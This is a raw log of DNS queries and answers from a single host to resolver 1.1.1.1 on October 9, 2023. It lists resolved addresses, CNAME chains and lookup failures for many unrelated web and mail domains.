                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:52.711477041 CEST1.1.1.1192.168.2.30xe050No error (0)redgiga.com172.67.186.153A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:52.711477041 CEST1.1.1.1192.168.2.30xe050No error (0)redgiga.com104.21.76.38A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:52.721847057 CEST1.1.1.1192.168.2.30xac88No error (0)mxs.mail.ru217.69.139.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:52.721847057 CEST1.1.1.1192.168.2.30xac88No error (0)mxs.mail.ru94.100.180.31A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:52.849911928 CEST1.1.1.1192.168.2.30xb286No error (0)zugseil.com92.42.191.40A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:52.854298115 CEST1.1.1.1192.168.2.30x8105No error (0)adeesa.net172.67.209.11A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:52.854298115 CEST1.1.1.1192.168.2.30x8105No error (0)adeesa.net104.21.77.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:52.856264114 CEST1.1.1.1192.168.2.30xdadaNo error (0)deckoviny.cz88.86.118.82A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:52.856417894 CEST1.1.1.1192.168.2.30x5ff8Name error (3)polprime.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:52.875950098 CEST1.1.1.1192.168.2.30xc46bNo error (0)absblast.com141.193.213.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:52.888540030 CEST1.1.1.1192.168.2.30xb2a1No error (0)alt4.gmail-smtp-in.l.google.com172.253.126.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:52.894578934 CEST1.1.1.1192.168.2.30x9591No error (0)uhsa.edu.ag192.124.249.13A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:52.895065069 CEST1.1.1.1192.168.2.30x3420No error (0)sokuwan.net185.230.63.186A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:52.895065069 CEST1.1.1.1192.168.2.30x3420No error (0)sokuwan.net185.230.63.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:52.895065069 CEST1.1.1.1192.168.2.30x3420No error (0)sokuwan.net185.230.63.171A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:52.912688017 CEST1.1.1.1192.168.2.30xc1baNo error (0)amic.at78.46.224.133A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:52.919557095 CEST1.1.1.1192.168.2.30xb66No error (0)okashimo.com203.137.75.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:52.957206011 CEST1.1.1.1192.168.2.30x5b2cNo error (0)vonparis.com23.185.0.4A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:52.966111898 CEST1.1.1.1192.168.2.30xa0b7No error (0)pellys.co.uk77.72.4.226A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:52.983495951 CEST1.1.1.1192.168.2.30xa6a2No error (0)mijash3.com198.185.159.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:52.983495951 CEST1.1.1.1192.168.2.30xa6a2No error (0)mijash3.com198.49.23.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:52.983495951 CEST1.1.1.1192.168.2.30xa6a2No error (0)mijash3.com198.185.159.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:52.983495951 CEST1.1.1.1192.168.2.30xa6a2No error (0)mijash3.com198.49.23.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:52.991710901 CEST1.1.1.1192.168.2.30x5e3dNo error (0)zupraha.cz77.78.104.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:52.995752096 CEST1.1.1.1192.168.2.30x670eNo error (0)icd-host.com192.252.159.116A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:52.995752096 CEST1.1.1.1192.168.2.30x670eNo error (0)icd-host.com192.252.159.165A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:52.998657942 CEST1.1.1.1192.168.2.30xb084No error (0)gbp-jp.com208.80.123.195A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:52.998657942 CEST1.1.1.1192.168.2.30xb084No error (0)gbp-jp.com208.80.122.2A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:52.998657942 CEST1.1.1.1192.168.2.30xb084No error (0)gbp-jp.com208.80.122.205A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:52.998657942 CEST1.1.1.1192.168.2.30xb084No error (0)gbp-jp.com208.80.123.104A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:53.000252008 CEST1.1.1.1192.168.2.30x4634No error (0)xsui.com127.0.0.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:53.051392078 CEST1.1.1.1192.168.2.30xba33No error (0)mackusick.com217.160.0.179A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:53.052483082 CEST1.1.1.1192.168.2.30xda03No error (0)cbras.com54.39.198.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:53.065248966 CEST1.1.1.1192.168.2.30x5f2eNo error (0)jsaps.com49.212.235.59A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:53.074796915 CEST1.1.1.1192.168.2.30xdbe6No error (0)smitko.net31.15.12.103A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:53.099142075 CEST1.1.1.1192.168.2.30xdd85No error (0)refintl.org198.185.159.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:53.099142075 CEST1.1.1.1192.168.2.30xdd85No error (0)refintl.org198.49.23.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:53.099142075 CEST1.1.1.1192.168.2.30xdd85No error (0)refintl.org198.49.23.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:53.099142075 CEST1.1.1.1192.168.2.30xdd85No error (0)refintl.org198.185.159.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:53.101346016 CEST1.1.1.1192.168.2.30x8b8cNo error (0)in1.smtp.messagingengine.com103.168.172.218A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:53.101346016 CEST1.1.1.1192.168.2.30x8b8cNo error (0)in1.smtp.messagingengine.com103.168.172.216A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:53.101346016 CEST1.1.1.1192.168.2.30x8b8cNo error (0)in1.smtp.messagingengine.com103.168.172.217A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:53.101346016 CEST1.1.1.1192.168.2.30x8b8cNo error (0)in1.smtp.messagingengine.com103.168.172.221A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:53.101346016 CEST1.1.1.1192.168.2.30x8b8cNo error (0)in1.smtp.messagingengine.com103.168.172.220A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:53.101346016 CEST1.1.1.1192.168.2.30x8b8cNo error (0)in1.smtp.messagingengine.com103.168.172.219A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:53.150753975 CEST1.1.1.1192.168.2.30x44bfName error (3)agitz.com.brnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:53.255072117 CEST1.1.1.1192.168.2.30x78b6No error (0)wantapc.net157.7.107.49A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:53.271624088 CEST1.1.1.1192.168.2.30xe2a4No error (0)ssm.ch93.189.66.202A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:53.276073933 CEST1.1.1.1192.168.2.30x9b69No error (0)workplus.hu81.0.97.108A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:53.303113937 CEST1.1.1.1192.168.2.30x157eNo error (0)daytonir.com172.64.147.213A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:53.303113937 CEST1.1.1.1192.168.2.30x157eNo error (0)daytonir.com104.18.40.43A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:53.304994106 CEST1.1.1.1192.168.2.30x9052No error (0)wvs-net.de172.67.181.113A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:53.304994106 CEST1.1.1.1192.168.2.30x9052No error (0)wvs-net.de104.21.43.163A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:53.306864023 CEST1.1.1.1192.168.2.30x2985No error (0)redgiga.com172.67.186.153A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:53.306864023 CEST1.1.1.1192.168.2.30x2985No error (0)redgiga.com104.21.76.38A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:53.308016062 CEST1.1.1.1192.168.2.30x26c1No error (0)ifesnet.com104.21.24.39A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:53.308016062 CEST1.1.1.1192.168.2.30x26c1No error (0)ifesnet.com172.67.216.194A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:53.315470934 CEST1.1.1.1192.168.2.30xfb46No error (0)orlyhotel.com172.67.156.49A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:53.315470934 CEST1.1.1.1192.168.2.30xfb46No error (0)orlyhotel.com104.21.48.207A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:53.319128036 CEST1.1.1.1192.168.2.30x36afNo error (0)missnue.com104.21.234.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:53.319128036 CEST1.1.1.1192.168.2.30x36afNo error (0)missnue.com104.21.234.121A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:53.359627008 CEST1.1.1.1192.168.2.30x5027No error (0)komie.com59.106.13.181A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:53.396287918 CEST1.1.1.1192.168.2.30xf2f7No error (0)banvari.com23.227.38.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:53.477401018 CEST1.1.1.1192.168.2.30x9b26No error (0)calvinly.com216.239.34.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:53.477401018 CEST1.1.1.1192.168.2.30x9b26No error (0)calvinly.com216.239.38.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:53.477401018 CEST1.1.1.1192.168.2.30x9b26No error (0)calvinly.com216.239.36.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:53.477401018 CEST1.1.1.1192.168.2.30x9b26No error (0)calvinly.com216.239.32.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:53.484989882 CEST1.1.1.1192.168.2.30x9136No error (0)dspears.comtraff-4.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:53.484989882 CEST1.1.1.1192.168.2.30x9136No error (0)traff-4.hugedomains.comhdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:53.484989882 CEST1.1.1.1192.168.2.30x9136No error (0)hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com52.86.6.113A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:53.484989882 CEST1.1.1.1192.168.2.30x9136No error (0)hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com3.94.41.167A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:53.557466030 CEST1.1.1.1192.168.2.30xedccNo error (0)geecl.com194.76.27.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:53.571249008 CEST1.1.1.1192.168.2.30x75bbNo error (0)ifesnet.com104.21.24.39A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:53.571249008 CEST1.1.1.1192.168.2.30x75bbNo error (0)ifesnet.com172.67.216.194A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:53.577491045 CEST1.1.1.1192.168.2.30xa75cNo error (0)nlcv.bas.bg195.96.252.188A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:53.577822924 CEST1.1.1.1192.168.2.30x8645No error (0)k-nikko.com13.113.204.223A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:53.577822924 CEST1.1.1.1192.168.2.30x8645No error (0)k-nikko.com18.179.184.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:53.591007948 CEST1.1.1.1192.168.2.30x9db8No error (0)sigtoa.com172.67.160.168A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:53.591007948 CEST1.1.1.1192.168.2.30x9db8No error (0)sigtoa.com104.21.49.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:53.596484900 CEST1.1.1.1192.168.2.30x9de4Name error (3)chzko.runonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:53.600824118 CEST1.1.1.1192.168.2.30x887fNo error (0)ikulani.com157.7.107.88A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:53.611119032 CEST1.1.1.1192.168.2.30x2aa4No error (0)yoruksut.com93.187.206.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:53.614289999 CEST1.1.1.1192.168.2.30xabdNo error (0)www.pb-games.compb-games.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:53.614289999 CEST1.1.1.1192.168.2.30xabdNo error (0)pb-games.com173.254.28.29A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:53.645375013 CEST1.1.1.1192.168.2.30x24a5No error (0)any-s.net108.170.12.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:53.648761988 CEST1.1.1.1192.168.2.30x2f0dNo error (0)from30ty.com157.7.231.224A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:53.660164118 CEST1.1.1.1192.168.2.30xf5ecNo error (0)rast.se93.188.2.51A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:53.670563936 CEST1.1.1.1192.168.2.30xf46No error (0)ccssinc.com172.67.185.152A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:53.670563936 CEST1.1.1.1192.168.2.30xf46No error (0)ccssinc.com104.21.19.68A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:53.671032906 CEST1.1.1.1192.168.2.30xed53No error (0)rtcasey.com69.195.90.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:53.671401024 CEST1.1.1.1192.168.2.30xe636No error (0)themark.org35.172.94.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:53.671401024 CEST1.1.1.1192.168.2.30xe636No error (0)themark.org100.24.208.97A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:53.674155951 CEST1.1.1.1192.168.2.30xc5a0No error (0)cbaben.com173.205.126.33A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:53.680823088 CEST1.1.1.1192.168.2.30x2309No error (0)onzcda.com15.197.204.56A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:53.680823088 CEST1.1.1.1192.168.2.30x2309No error (0)onzcda.com3.33.243.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:53.689862013 CEST1.1.1.1192.168.2.30x506Server failure (2)invictus.plnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:53.691001892 CEST1.1.1.1192.168.2.30x4ab3No error (0)xsui.com127.0.0.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:53.705380917 CEST1.1.1.1192.168.2.30x1060No error (0)stopllc.com162.241.233.114A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:53.708214998 CEST1.1.1.1192.168.2.30x552aNo error (0)acraloc.com185.230.63.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:53.729626894 CEST1.1.1.1192.168.2.30x7123No error (0)wahw.com.au54.194.190.151A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:53.732949972 CEST1.1.1.1192.168.2.30x677eNo error (0)reproar.com194.143.194.23A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:53.779828072 CEST1.1.1.1192.168.2.30x8101No error (0)sinwal.com172.67.206.199A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:53.779828072 CEST1.1.1.1192.168.2.30x8101No error (0)sinwal.com104.21.50.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:53.825212955 CEST1.1.1.1192.168.2.30x7a5eNo error (0)cutchie.com199.59.243.225A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:53.835720062 CEST1.1.1.1192.168.2.30x31d7No error (0)bidroll.com13.56.33.8A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:53.853482008 CEST1.1.1.1192.168.2.30xd967No error (0)insia.com82.208.6.9A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:53.859164000 CEST1.1.1.1192.168.2.30x64b7No error (0)metaforacom.com185.42.105.162A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:53.888587952 CEST1.1.1.1192.168.2.30x3414No error (0)unicus.jp49.212.232.113A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:53.932631016 CEST1.1.1.1192.168.2.30x3e84No error (0)deckoviny.cz88.86.118.82A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:53.965758085 CEST1.1.1.1192.168.2.30x79e8No error (0)univi.it18.197.121.220A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:53.969541073 CEST1.1.1.1192.168.2.30x6ddcNo error (0)calvinly.com216.239.36.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:53.969541073 CEST1.1.1.1192.168.2.30x6ddcNo error (0)calvinly.com216.239.32.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:53.969541073 CEST1.1.1.1192.168.2.30x6ddcNo error (0)calvinly.com216.239.38.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:53.969541073 CEST1.1.1.1192.168.2.30x6ddcNo error (0)calvinly.com216.239.34.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:53.988291979 CEST1.1.1.1192.168.2.30xe729No error (0)hyab.se104.21.52.126A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:53.988291979 CEST1.1.1.1192.168.2.30xe729No error (0)hyab.se172.67.199.57A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:53.990067959 CEST1.1.1.1192.168.2.30x4715Name error (3)mail7.digitalwaves.co.nznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:53.994878054 CEST1.1.1.1192.168.2.30x375eNo error (0)zemarmot.net164.132.175.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.000859976 CEST1.1.1.1192.168.2.30x656cNo error (0)flamingorecordings.com35.214.171.193A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.013273001 CEST1.1.1.1192.168.2.30x2644No error (0)coxkitchensandbaths.com205.149.134.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.036604881 CEST1.1.1.1192.168.2.30x7eb2No error (0)touchfam.ca15.197.142.173A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.036604881 CEST1.1.1.1192.168.2.30x7eb2No error (0)touchfam.ca3.33.152.147A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.040597916 CEST1.1.1.1192.168.2.30xcaffServer failure (2)atis-sk.canonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.048979044 CEST1.1.1.1192.168.2.30xde2eNo error (0)portoccd.org51.89.6.56A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.070616961 CEST1.1.1.1192.168.2.30x3a42No error (0)vdoherty.com91.216.241.100A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.107855082 CEST1.1.1.1192.168.2.30x5aacName error (3)grlawcc.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.111479998 CEST1.1.1.1192.168.2.30x30f3No error (0)dhh.la.gov52.200.51.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.148118019 CEST1.1.1.1192.168.2.30x1284No error (0)magicomm.co.uk83.223.113.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.186983109 CEST1.1.1.1192.168.2.30xa012No error (0)techtrans.de185.237.66.112A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.212876081 CEST1.1.1.1192.168.2.30x4406No error (0)shiner.com172.67.143.148A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.212876081 CEST1.1.1.1192.168.2.30x4406No error (0)shiner.com104.21.27.205A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.247287035 CEST1.1.1.1192.168.2.30x1a13No error (0)ramkome.com145.239.5.159A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.247953892 CEST1.1.1.1192.168.2.30xe056No error (0)fifa-ews.com172.67.189.227A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.247953892 CEST1.1.1.1192.168.2.30xe056No error (0)fifa-ews.com104.21.10.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.287609100 CEST1.1.1.1192.168.2.30x9b82No error (0)tbvlugus.nl174.129.25.170A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.291759968 CEST1.1.1.1192.168.2.30x8af4No error (0)impexnc.com208.91.197.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.309297085 CEST1.1.1.1192.168.2.30xc5baName error (3)iranytu.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.313436031 CEST1.1.1.1192.168.2.30x7d7eNo error (0)canasil.com172.67.68.180A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.313436031 CEST1.1.1.1192.168.2.30x7d7eNo error (0)canasil.com104.26.3.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.313436031 CEST1.1.1.1192.168.2.30x7d7eNo error (0)canasil.com104.26.2.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.388063908 CEST1.1.1.1192.168.2.30xb67dNo error (0)scip.org.uk172.67.72.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.388063908 CEST1.1.1.1192.168.2.30xb67dNo error (0)scip.org.uk104.26.13.244A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.388063908 CEST1.1.1.1192.168.2.30xb67dNo error (0)scip.org.uk104.26.12.244A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.402195930 CEST1.1.1.1192.168.2.30x7ebNo error (0)hes.pt52.19.230.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.402215004 CEST1.1.1.1192.168.2.30x7ebNo error (0)hes.pt52.19.230.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.406119108 CEST1.1.1.1192.168.2.30x7650No error (0)shittas.com192.3.246.178A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.406728029 CEST1.1.1.1192.168.2.30xa6deNo error (0)rappich.de89.31.143.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.452291965 CEST1.1.1.1192.168.2.30x14b6No error (0)orbitgas.com107.180.58.31A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.494187117 CEST1.1.1.1192.168.2.30xa957No error (0)doggybag.org213.186.33.16A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.514050961 CEST1.1.1.1192.168.2.30x42bfNo error (0)kumaden.com49.212.180.178A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.538551092 CEST1.1.1.1192.168.2.30xf97eNo error (0)shesfit.com104.21.74.141A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.538551092 CEST1.1.1.1192.168.2.30xf97eNo error (0)shesfit.com172.67.158.251A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.558208942 CEST1.1.1.1192.168.2.30x4eNo error (0)kewlmail.com34.174.61.199A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.558429003 CEST1.1.1.1192.168.2.30x4eNo error (0)kewlmail.com34.174.61.199A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.558480024 CEST1.1.1.1192.168.2.30x4eNo error (0)kewlmail.com34.174.61.199A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.592773914 CEST1.1.1.1192.168.2.30x408fNo error (0)bggs.com35.230.155.43A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.626640081 CEST1.1.1.1192.168.2.30x6fb5No error (0)strazynski.pl85.128.196.22A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.664751053 CEST1.1.1.1192.168.2.30xab5cNo error (0)nts-web.net49.212.235.175A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.677630901 CEST1.1.1.1192.168.2.30x14f1No error (0)kevyt.net172.67.129.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.677630901 CEST1.1.1.1192.168.2.30x14f1No error (0)kevyt.net104.21.2.101A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.681003094 CEST1.1.1.1192.168.2.30xc4ebNo error (0)nolaoig.org54.212.145.129A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Oct 9, 2023 15:50:54.683121920 CEST1.1.1.1192.168.2.30xbf07No error (0)mackusick.de217.160.0.131A (IP address)IN (0x0001)false
